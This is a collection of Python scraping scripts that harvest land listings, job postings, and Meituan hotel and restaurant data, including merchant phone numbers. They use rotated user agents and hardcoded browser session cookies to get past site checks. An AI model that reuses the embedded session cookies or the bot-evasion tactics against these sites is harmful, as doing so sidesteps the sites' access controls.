return x_data3,y_data1,y_data2,y_data3,y_data4,y_data5,y_data6,y_data7,y_data8,y_data9,y_data10
# y_data2[0], y_data2[1],y_data2[2] = None, None,None
# y_data4[1] = None
# c = (
# Line()
# .add_xaxis(xaxis_data=x_data3)
# .add_yaxis(
# series_name="微博",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#F2D7D5",
# y_axis=y_data1,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .add_yaxis(
# series_name="环球网",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#C0392B",
# y_axis=y_data2,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .add_yaxis(
# series_name="中国台湾网",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#641E16",
# y_axis=y_data3,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .add_yaxis(
# series_name="知乎",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#9B59B6",
# y_axis=y_data4,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .add_yaxis(
# series_name="中国日报网",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#512E5F",
# y_axis=y_data5,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .add_yaxis(
# series_name="中新网",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#2980B9",
# y_axis=y_data6,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .add_yaxis(
# series_name="今日头条",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#154360",
# y_axis=y_data7,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .add_yaxis(
# series_name="光明网",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#3498DB",
# y_axis=y_data8,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .add_yaxis(
# series_name="凤凰网",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#1ABC9C",
# y_axis=y_data9,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .add_yaxis(
# series_name="新华网",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#0E6251",
# y_axis=y_data10,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .set_global_opts(
# title_opts=opts.TitleOpts(title="各大平台台海局势热度"),
# tooltip_opts=opts.TooltipOpts(trigger="axis"),
# yaxis_opts=opts.AxisOpts(
# type_="value",
# axistick_opts=opts.AxisTickOpts(is_show=True),
# splitline_opts=opts.SplitLineOpts(is_show=True),
# ),
# xaxis_opts=opts.AxisOpts(type_="category", boundary_gap=False, axisline_opts=opts.AxisLineOpts(
# is_on_zero=False, linestyle_opts=opts.LineStyleOpts(color="#d14a61")
# )),
# )
# .render("./templates/各大平台台海热度折线图.html")
# )
#
#
# if __name__ == '__main__':
# terrace_line()
```
#### File: Crawl-Project2/土流网/main.py
```python
import requests
from lxml import etree
import random
import time
import pandas as pd
import openpyxl
from tqdm import tqdm
user_agent = [
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
]
headers = {
"User-Agent": random.choice(user_agent)
}
wb = openpyxl.Workbook()
sheet = wb.active
sheet.append(['土地位置', '出让形式', '推出时间', '土地面积', '规划建筑面积', '土地地址', '成交状态', '土地代号', '规划用途'])
def get_parse(url):
html = requests.get(url,headers=headers)
if html.status_code == 200:
get_html(html)
else:
print(html.status_code)
def get_html(html):
content = html.text
soup = etree.HTML(content)
lis = soup.xpath('//div[@class="land-l-cont"]/dl')
for li in lis:
try:
location = li.xpath('.//dd/p[7]/text()')[0] # 土地位置
transfer_form = li.xpath('.//dt/i/text()')[0] # 出让形式
launch_time = li.xpath('.//dd/p[1]/text()')[0] # 推出时间
land_area = li.xpath('.//dd/p[3]/text()')[0] # 土地面积
planning_area = li.xpath('.//dd/p[5]/text()')[0] # 规划建筑面积
address = li.xpath('.//dd/p[4]/text()')[0] # 土地地址
state = li.xpath('.//dd/p[2]/text()')[0] # 成交状态
area_code = li.xpath('.//dt/span/text()')[0] # 土地代号
planned_use = li.xpath('.//dd/p[6]/text()')[0] # 规划用途
data = [location,transfer_form,launch_time,land_area,planning_area,address,state,area_code,planned_use]
sheet.append(data)
except:
pass
wb.save(filename="real_estate_info.xlsx")
time.sleep(2)
def downloads(location,transfer_form,launch_time,land_area,planning_area,address,state,area_code,planned_use):
df = pd.DataFrame()
df['土地位置'] = location
df['出让形式'] = transfer_form
df['推出时间'] = launch_time
df['土地面积'] = land_area
df['规划建筑面积'] = planning_area
df['土地地址'] = address
df['成交状态'] = state
df['土地代号'] = area_code
df['规划用途'] = planned_use
try:
df.to_csv("土地租聘信息.csv", mode="a+", header=None, index=None, encoding="gbk")
print("写入成功")
except:
print("当页数据写入失败")
if __name__ == '__main__':
for i in tqdm(range(10)):
url = 'https://www.tudinet.com/market-0-0-0-0/list-pg{}.html'.format(i)
get_parse(url)
```
#### File: Crawl-Project2/爬取前程无忧招聘信息/test.py
```python
import requests
import re
from lxml import etree
import pandas as pd
import time
import warnings
warnings.filterwarnings("ignore")
headers = {
"Host": "search.51job.com",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36",
}
def get_parse(url):
html = requests.get(url,headers=headers)
if html.status_code ==200:
get_html(html)
else:
print(html.status_code)
def get_html(html):
content =html.text
#招聘企业名称
company_names = re.compile('"company_name":"(.*?)",',re.S|re.I)
company_name = company_names.findall(content)
#招聘企业规模
companysize_texts = re.compile('"companysize_text":"(.*?)",', re.S | re.I)
companysize_text = companysize_texts.findall(content)
#招聘企业性质
companytype_texts = re.compile('"companytype_text":"(.*?)",', re.S | re.I)
companytype_text = companytype_texts.findall(content)
#招聘工作地区
workarea_texts = re.compile('"workarea_text":"(.*?)",', re.S | re.I)
workarea_text = workarea_texts.findall(content)
#招聘职位名称
job_names = re.compile('"job_name":"(.*?)",', re.S | re.I)
job_name = job_names.findall(content)
#招聘岗位薪资
providesalary_texts = re.compile('"providesalary_text":"(.*?)",', re.S | re.I)
providesalary_text = providesalary_texts.findall(content)
job_hrefs = re.compile('"job_href":"(.*?)",', re.S | re.I)
job_href = job_hrefs.findall(content)
JobDescribe = []
providesalary = []
for i in job_href:
job_url = i.replace("\\","")
html = requests.get(job_url, headers=headers)
html.encoding = "gbk"
content = html.text
dom_test = etree.HTML(content)
job_describe = dom_test.xpath('//div[@class="tBorderTop_box"]//div[@class="bmsg job_msg inbox"]/p/text()')
JobDescribe.append(job_describe)
for pt in providesalary_text:
p = pt.replace("\\","")
providesalary.append(p)
df = pd.DataFrame()
df["企业名称"] = company_name
df["企业规模"] = companysize_text
df["企业性质"] = companytype_text
df["工作地区"] = workarea_text
df["职位名称"] = job_name
df["岗位薪资"] = providesalary
df["岗位描述"] = JobDescribe
try:
df.to_csv("job_info.csv", mode="a+", header=None, index=None, encoding="gbk")
print("写入成功")
except:
print("当页数据写入失败")
time.sleep(1)
if __name__ == '__main__':
url = "https://search.51job.com/list/030000%252c070000%252c080000%252c090000%252c100000,000000,4919,53,9,99,+,2,3.html?lang=c&postchannel=0000&workyear=99&cotype=99°reefrom=99&jobterm=99&companysize=99&ord_field=0&dibiaoid=0&line=&welfare="
get_parse(url)
# url = "https://jobs.51job.com/chengdu-jnq/119326084.html?s=01&t=0"
# get_url(url)
```
#### File: Crawl-Project2/爬取大街网招聘信息/test.py
```python
import requests
import re
from lxml import etree
import pandas as pd
headers = {
'accept-language': 'zh-CN,zh;q=0.9',
'accept-encoding': 'gzip, deflate, br',
'accept': 'application/json, text/javascript, */*; q=0.01',
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"x-requested-with": "XMLHttpRequest",
"referer": "https://so.dajie.com/job/search?keyword=%E6%97%85%E8%A1%8C%E9%A1%BE%E9%97%AE&from=job&clicktype=blank",
'cookie': 'DJ_UVID=MTU5NzMyNzYzNjYxODExNTQw; _ga=GA1.2.2113787223.1597327635; _gid=GA1.2.1553008633.1597327635; MEIQIA_TRACK_ID=1g2znXAAakoQxBn9cSd2boCOxHN; _close_autoreg=1597334910407; _close_autoreg_num=5; DJ_RF=https%3A%2F%2Fwww.google.com%2F; DJ_EU=http%3A%2F%2Fwww.dajie.com%2F; Hm_lvt_6822a51ffa95d58bbe562e877f743b4f=1597327635,1597376484; SO_COOKIE_V2=91b1/LLiPqrkBlt1yP4yx5bqjB/kwilwrtdVxRTRUZqmpMjU/5RtNWD+oAPPvHtuxGQn3mc9q71BMOx/GNkNbKVMO6Mx3uVTF2yf; MEIQIA_VISIT_ID=1g4aoj42bTgLv7gu9WBU5MFANSd; USER_ACTION="request^A-^A-^Ajobdetail:^A-"; Hm_lpvt_6822a51ffa95d58bbe562e877f743b4f=1597376528',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36',
}
def get_parse(url):
html = requests.get(url,headers =headers)
if html.status_code ==200:
get_html(html)
else:
print(html.status_code)
def get_html(html):
content = html.text
# 招聘企业名称
company_names = re.compile('"compName":"(.*?)",', re.S | re.I)
company_name = company_names.findall(content)
# 招聘企业规模
companysize_texts = re.compile('"scaleName":"(.*?)",', re.S | re.I)
companysize_text = companysize_texts.findall(content)
# 招聘工作地区
workarea_texts = re.compile('"pubCity":"(.*?)",', re.S | re.I)
workarea_text = workarea_texts.findall(content)
# 招聘职位名称
job_names = re.compile('"jobName":"(.*?)",', re.S | re.I)
job_name = job_names.findall(content)
# 招聘岗位薪资
providesalary_texts = re.compile('"salary":"(.*?)",', re.S | re.I)
providesalary_text = providesalary_texts.findall(content)
jids = re.compile('"jid":"(.*?)",', re.S | re.I)
jid = jids.findall(content)
JobDescribe = []
Companytype = []
for i in range(len(jid)):
href = "https://job.dajie.com/{}.html".format(jid[i])
html = requests.get(href,headers=headers)
content = html.text
soup = etree.HTML(content)
job_describe = soup.xpath("//pre/text()")
companytype = soup.xpath('//ul[@class = "info"]/li/span/text()')[-1]
JobDescribe.append(job_describe)
Companytype.append(companytype)
df = pd.DataFrame()
df["企业名称"] = company_name
df["企业规模"] = companysize_text
df["企业性质"] = Companytype
df["工作地区"] = workarea_text
df["职位名称"] = job_name
df["岗位薪资"] = providesalary_text[:-1]
df["岗位描述"] = JobDescribe
try:
df.to_csv("大街网.csv", mode="a+", header=None, index=None, encoding="gbk")
print("写入成功")
except:
print("当页数据写入失败")
if __name__ == '__main__':
for i in range(1,3,1):
url = "https://so.dajie.com/job/ajax/search/filter?keyword=%E6%97%85%E6%B8%B8&order=0&city=&recruitType=&salary=&experience=&page=1&positionFunction=&_CSRFToken=&ajax={}".format(i)
get_parse(url)
```
#### File: Crawl-Project2/爬取拉勾网招聘信息/main.py
```python
import requests
import re
from lxml import etree
import pandas as pd
import time
from tqdm import tqdm
import hashlib
import random
from urllib import parse
md5 = hashlib.md5()
id = str(random.random())
md5.update(id.encode('utf-8'))
random_id = md5.hexdigest()
keyword = parse.quote(input("请输入你要的关键词:"))
def get_cookie():
url = 'https://www.lagou.com/jobs/list_{}?labelWords=&fromSearch=true&suginput='.format(keyword)
# 注意如果url中有中文,需要把中文字符编码后才可以正常运行
headers = {
'User-Agent': 'ozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3704.400 QQBrowser/10.4.3587.400'
}
response = requests.get(url=url,headers=headers,allow_redirects=False)
return response.cookies
def get_html(url,i):
headers = {
'Host': 'www.lagou.com',
'Origin': 'https://www.lagou.com',
'referer': 'https://www.lagou.com/jobs/list_{}?labelWords=&fromSearch=true&suginput='.format(keyword),
'User-Agent': 'ozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3704.400 QQBrowser/10.4.3587.400'
}
data = {
'first': 'false',
'pn':int(i),
'kd': '景区讲解员',
'sid':str(random_id),
}
s = requests.Session()
response = s.post(url,data=data,headers=headers,cookies=get_cookie())
# 这里的请求是post且获取的内容是json格式,因此使用json=data的方式才能获取到数据
response.encoding = response.apparent_encoding # 根据网页内容分析出的编码方式。
content = response.text
# 招聘企业名称
company_names = re.compile('"companyFullName":"(.*?)",', re.S | re.I)
company_name = company_names.findall(content)
# 招聘企业规模
companysize_texts = re.compile('"companySize":"(.*?)",', re.S | re.I)
companysize_text = companysize_texts.findall(content)
# 招聘企业性质
companytype_texts = re.compile('"financeStage":"(.*?)",', re.S | re.I)
companytype_text = companytype_texts.findall(content)
# 招聘工作地区
workarea_texts = re.compile('"city":"(.*?)",', re.S | re.I)
workarea_text = workarea_texts.findall(content)
# 招聘职位名称
job_names = re.compile('"positionName":"(.*?)",', re.S | re.I)
job_name = job_names.findall(content)
# 招聘岗位薪资
providesalary_texts = re.compile('"salary":"(.*?)",', re.S | re.I)
providesalary_text = providesalary_texts.findall(content)
job_hrefs = re.compile('"positionId":(.*?),"', re.S | re.I)
job_href = job_hrefs.findall(content)
params = {
'show':str(random_id),
}
jobdescribe = []
JobDescribe = []
Jobname = []
for j in job_href:
href = "https://www.lagou.com/jobs/{}.html?show={}".format(j,str(random_id))
html = requests.get(href, headers=headers, params=params, cookies=get_cookie())
context = html.text
soup = etree.HTML(context)
job_describe = soup.xpath('//div[@class= "job-detail"]/p/text()')
j_d = soup.xpath('//div[@class= "job-detail"]/text()')
job_name = soup.xpath('//h1[@class = "name"]/text()')
Jobname.append(job_name)
JobDescribe.append(job_describe)
jobdescribe.append(j_d)
df = pd.DataFrame()
df["企业名称"] = company_name
df["企业规模"] = companysize_text
df["企业性质"] = companytype_text
df["工作地区"] = workarea_text
df["职位名称"] = Jobname
df["岗位薪资"] = providesalary_text
df["岗位描述"] = JobDescribe
df["岗位介绍"] = jobdescribe
try:
df.to_csv("拉勾网.csv", mode="a+", header=None, index=None, encoding="gbk")
print("写入成功")
except:
print("当页数据写入失败")
time.sleep(1)
if __name__ == '__main__':
url = 'https://www.lagou.com/jobs/positionAjax.json?needAddtionalResult=false'
for i in tqdm(range(1,23,1)):
get_html(url,i)
```
#### File: Crawl-Project2/爬取美团酒店评论/main1.py
```python
import requests
import re
import json
import time
import random
user_agent = [
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
]
headers = {
'User-Agent': random.choice(user_agent),
'Cookie': 'uuid=13a0ebb3eb3f4e4ca3ab.1609749998.1.0.0; _lxsdk_cuid=176cc938bb490-0040463f3d68d8-c791039-e1000-176cc938bb5c8; iuuid=25A31E7553EB400F96942D62BCA7FFBAE7732C1D202A34A2546AD68C9161CB68; _lxsdk=25A31E7553EB400F96942D62BCA7FFBAE7732C1D202A34A2546AD68C9161CB68; Hm_lvt_f66b37722f586a240d4621318a5a6ebe=1609852138; _lx_utm=utm_source%3Dgoogle%26utm_medium%3Dorganic; IJSESSIONID=g6l850xqurcl1otf9tpe9753a; ci=101; rvct=101%2C60%2C45%2C207; cityname=%E5%A4%AA%E5%8E%9F; _lxsdk_s=176f5727756-670-5a-cae%7C%7C13',
}
#去判断一个页面是否是正常,如果正常那么进行下一步抓取
def get_parse(url):
html = requests.get(url,headers= headers)
time.sleep(random.random())
if html.status_code == 200:
get_html(html)
else:
print(html.status_code)
#用正则去获取当前酒店的名称,地址,最低价,评分,酒店的id,评论的总数
def get_html(html):
content = html.text
#定位酒店名称
names = re.compile('"name":"(.*?)",', re.I | re.S)
name = names.findall(content)
#定位酒店地址
addrs = re.compile('"addr":"(.*?)",', re.I | re.S)
addr = addrs.findall(content)
#定位城市
citys = re.compile('"cityName":(.*?),"', re.I | re.S)
city = citys.findall(content)
#定位评分
scoreIntros = re.compile('"scoreIntro":"(.*?)",', re.I | re.S)
scoreIntro = scoreIntros.findall(content)
# 酒店类型
hotelStars = re.compile('"hotelStar":"(.*?)",', re.I | re.S)
hotelStar = hotelStars.findall(content)
#酒店开业时间
start_businesss = re.compile('(\d+年开业)', re.I | re.S)
start_business = start_businesss.findall(content)
# 酒店装修时间
finishs = re.compile('(\d+年装修)', re.I | re.S)
finish = finishs.findall(content)
# 加一个防错机制,这样的目的是为了防止列表出现问题
try:
for i in range(len(name)):
print(name[i],hotelStar[i],start_business[i],finish[i],scoreIntro[i],city[i],addr[i])
#传参,把对应的参数传入到dowload函数里面,便于下载
dowload(name[i],hotelStar[i],start_business[i],finish[i],scoreIntro[i],city[i],addr[i])
except:
pass
def dowload(t,h,k,z,c,city,a):
data = {
'酒店名字': t,
'酒店类型': h,
'开业时间': k,
'装修时间': z,
'酒店评分': c,
'所在省份': '重庆市',
'所在城市': city,
'酒店地址': a,
}
with open("重庆市酒店的基本信息.txt","a+",encoding="utf-8")as f:
f.write(json.dumps(data,ensure_ascii=False)+"\n")
print("写入成功")
def city_number():
headers = {
'X-FOR-WITH': 'f34yJXBymO9/nLKKQNBCoOyOeXvb8mP1dIHo3fPlirAY2Yq1iJCrFfoFSpm8Ei3Y46j7TngamXaPsl+FJ//yY3IWzckDaU9LqotXgVl8dxdZ2ZcI3a7UpQ4Q5Ooo6NSgz0ov5LTWwLgAmCQ83uid0tLfXnei7TVYOcIJlGCPoSZITZlnxeg+8gObkiEubTQW6VJ8SYFrJC0WUBNKIssHYA==',
'Cookie': 'uuid=13a0ebb3eb3f4e4ca3ab.1609749998.1.0.0; _lxsdk_cuid=176cc938bb490-0040463f3d68d8-c791039-e1000-176cc938bb5c8; iuuid=25A31E7553EB400F96942D62BCA7FFBAE7732C1D202A34A2546AD68C9161CB68; _lxsdk=25A31E7553EB400F96942D62BCA7FFBAE7732C1D202A34A2546AD68C9161CB68; Hm_lvt_f66b37722f586a240d4621318a5a6ebe=1609852138; IJSESSIONID=177ybmei9ddit1d926tv41n3vk; _lx_utm=utm_source%3Dgoogle%26utm_medium%3Dorganic; ci=45; rvct=45%2C207%2C60; hotel_city_id=45; hotel_city_info=%7B%22id%22%3A45%2C%22name%22%3A%22%E9%87%8D%E5%BA%86%22%2C%22pinyin%22%3A%22chongqing%22%7D; cityname=%E9%87%8D%E5%BA%86; _lxsdk_s=176d5a7ea7a-33f-425-929%7C%7C66',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
}
url = 'https://hotel.meituan.com/dist/static/data/city.json?utm_medium=pc&version_name=999.9'
html = requests.get(url, headers=headers)
content = html.json()
data = content['data']
with open('省份城市.txt', 'r', encoding='utf-8') as f:
content1 = f.readlines()
city = []
for c in content1:
c = str(c)
c = c.split('(')
city.append(c[0])
number_list = []
for d in range(len(data)):
name = data[d]['name']
id = data[d]['id']
for c in city:
if name in c:
number_list.append(id)
return number_list
if __name__ == '__main__':
# 根据我们的URL得知,它的offset为翻页,20为翻一页,所以我们写一个循环,20为一跳转,这样便于我们爬取
# 20为翻一页,cateId为城市对应的数字,这里的20代表的是广州
# list1 = city_number()
# for l in list1:
for i in range(0,1121,20):
url = 'https://ihotel.meituan.com/hbsearch/HotelSearch?utm_medium=pc&version_name=999.9&cateId=20&attr_28=129&uuid=25A31E7553EB400F96942D62BCA7FFBAE7732C1D202A34A2546AD68C9161CB68%401610435737059&cityId=45&offset={}&limit=20&startDay=20210112&endDay=20210112&q=&sort=defaults&X-FOR-WITH=Jo6wwC0IQuYAQ9ZO9mXlbhpAAlyu8NRHyI7Jew8M9ICXAj3lFQo%2BOcckMzqCP34JLask2JO%2B8NUVSQxaZTqcpVYm%2Bi0%2BBTRPjZvX7%2FxpQ8Xd8SrIVNfvoO3TrPtZGZ9K4wSUFaKJvpgC9TB%2B%2BsWJ0hyC7VXbwZnS%2FIZmJ5hvy%2BJmu6qjc%2FlmupzoQTmH8CwfFB6O3PO5nPiY64sKxbwhWQ%3D%3D'.format(i)
get_parse(url)
# url = 'https://ihotel.meituan.com/hbsearch/HotelSearch?utm_medium=pc&version_name=999.9&cateId=20&attr_28=129&uuid=25A31E7553EB400F96942D62BCA7FFBAE7732C1D202A34A2546AD68C9161CB68%401610419861240&cityId=45&offset=0&limit=20&startDay=20210112&endDay=20210112&q=&sort=defaults&X-FOR-WITH=drT%2BLVdQBIXux2nsOKSwjpxYmaM4Nrpye2eal6kbfzVcVOT8vssVlfMkuHNFmBxG5253iAh1et4ZU0xiee8aYbEnC2flcCBPs2W0STKT2hGWZ97%2F2Dv62iwBHP42KSNdR6DygKzw1HCAukHuSGe%2FGiEPqGd7lFvumXyG8dGxx2L7ht6tIhsQaiP8eczllWLOoo7GbsW7uNXUa4n0AIFz5Q%3D%3D'
# get_parse(url)
```
#### File: Crawl-Project2/美团爬取商家信息/main.py
```python
import requests
import re
import json
from urllib import parse
import pandas as pd
import time
import matplotlib.pyplot as plt
import seaborn as sns
headers = {
"Origin": "https://bj.meituan.com",
"Host": "apimobile.meituan.com",
"Referer": "https://bj.meituan.com/s/%E7%81%AB%E9%94%85/",
"Cookie": "uuid=692a53319ce54d0c91f3.1597223761.1.0.0; ci=1; rvct=1; _lxsdk_cuid=173e1f47707c8-0dcd4ff30b4ae3-3323765-e1000-173e1f47707c8; _lxsdk_s=173e1f47708-21d-287-4d9%7C%7C35",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"
}
def get_parse(url):
html = requests.get(url,headers = headers)
if html.status_code:
get_html(html)
else:
print(html.status_code)
def get_html(html):
content = html.text
#店名
titles= re.compile('","title":"(.*?)",',re.S|re.I)
title = titles.findall(content)
#地址
addresses = re.compile(',"address":"(.*?)",', re.S | re.I)
address = addresses.findall(content)
#评分
avgscores = re.compile(',"avgscore":(.*?),', re.S | re.I)
avgscore = avgscores.findall(content)
#评价人数
commentses = re.compile(',"comments":(.*?),', re.S | re.I)
comments = commentses.findall(content)
#联系电话
phones = re.compile('"phone":"(.*?)",', re.S | re.I)
phone = phones.findall(content)
# 人均消费
df = pd.DataFrame()
df['店名'] = title
df['地址'] = address
df['评分'] = avgscore
df['评价人数'] = comments
df['联系电话'] = phone
df = df.drop_duplicates()
df = df.fillna('暂无数据')
cut = lambda x:'一般' if x<=3.5 else('不错' if x <=4.0 else("好" if x <=4.5 else "很好"))
df["评分类型"] = df['评分'].map(cut)
try:
df.to_csv("火锅信息.csv", mode="a+", header=None, index=None)
print("写入成功")
except:
print("当页数据写入失败")
time.sleep(1)
# #设置加载的字体名
# plt.rcParams['font.sans-serif'] = ['SimHei']
# #解放保存图像是负号"-"显示为方块的问题
# plt.rcParams['axes.unicode_minus'] = False
# fig,axes = plt.subplots(2,1,figsize=(12,12))
# sns.regplot(x= "人均消费",y = "评分",data = df,color='r',marker="+",ax = axes[0])
# sns.regplot(x="评价人数", y="评分", data=df, color='g', marker="*", ax=axes[1])
if __name__ == '__main__':
#在这个URL里面offse参数每次翻页增加32,limit参数是一次请求的数据量,q是搜索关键词poi/pcsearch/1?其中的1是北京城市的id编号。
for i in range(0,33,32):
url = "https://apimobile.meituan.com/group/v4/poi/pcsearch/1?uuid=692a53319ce54d0c91f3.1597223761.1.0.0&userid=-1&limit=32&offset={}&cateId=-1&q=%E7%81%AB%E9%94%85".format(i)
get_parse(url)
```
#### File: Crawl-Project2/美团爬取商家信息/paquxinxi.py
```python
import requests
import re
import json
headers = {
"Origin": "https://bj.meituan.com",
"Host": "apimobile.meituan.com",
"Referer": "https://bj.meituan.com/s/%E7%81%AB%E9%94%85/",
"Cookie": "uuid=692a53319ce54d0c91f3.1597223761.1.0.0; ci=1; rvct=1; _lxsdk_cuid=173e1f47707c8-0dcd4ff30b4ae3-3323765-e1000-173e1f47707c8; _lxsdk_s=173e1f47708-21d-287-4d9%7C%7C35",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"
}
def get_parse(url):
html = requests.get(url,headers = headers)
if html.status_code:
get_html(html)
else:
print(html.status_code)
def get_html(html):
content = html.text
#店名
titles= re.compile('","title":"(.*?)",',re.S|re.I)
title = titles.findall(content)
#地址
addresses = re.compile(',"address":"(.*?)",', re.S | re.I)
address = addresses.findall(content)
#评分
avgscores = re.compile(',"avgscore":(.*?),', re.S | re.I)
avgscore = avgscores.findall(content)
#评价人数
commentses = re.compile(',"comments":(.*?),', re.S | re.I)
comments = commentses.findall(content)
#联系电话
phones = re.compile('"phone":"(.*?)",', re.S | re.I)
phone = phones.findall(content)
for i in range(len(title)):
try:
t = title[i]
a = address[i]
avg = avgscore[i]
c = comments[i]
p = phone[i]
print(t,a,avg,c,p)
dowload(t,a,avg,c,p)
except:
pass
def dowload(t,a,avg,c,p):
data = {
'店铺名称': t,
'店铺地址': a,
'店铺评分': avg,
'评价人数': c,
'电话': p
}
with open("美团信息.txt","a+",encoding="utf-8")as f:
f.write(json.dumps(data,ensure_ascii=False)+"\n")
print("写入成功")
if __name__ == '__main__':
#在这个URL里面offse参数每次翻页增加32,limit参数是一次请求的数据量,q是搜索关键词poi/pcsearch/1?其中的1是北京城市的id编号。
for i in range(0,33,32):
url = "https://apimobile.meituan.com/group/v4/poi/pcsearch/1?uuid=692a53319ce54d0c91f3.1597223761.1.0.0&userid=-1&limit=32&offset={}&cateId=-1&q=%E7%81%AB%E9%94%85".format(i)
get_parse(url)
``` |
{
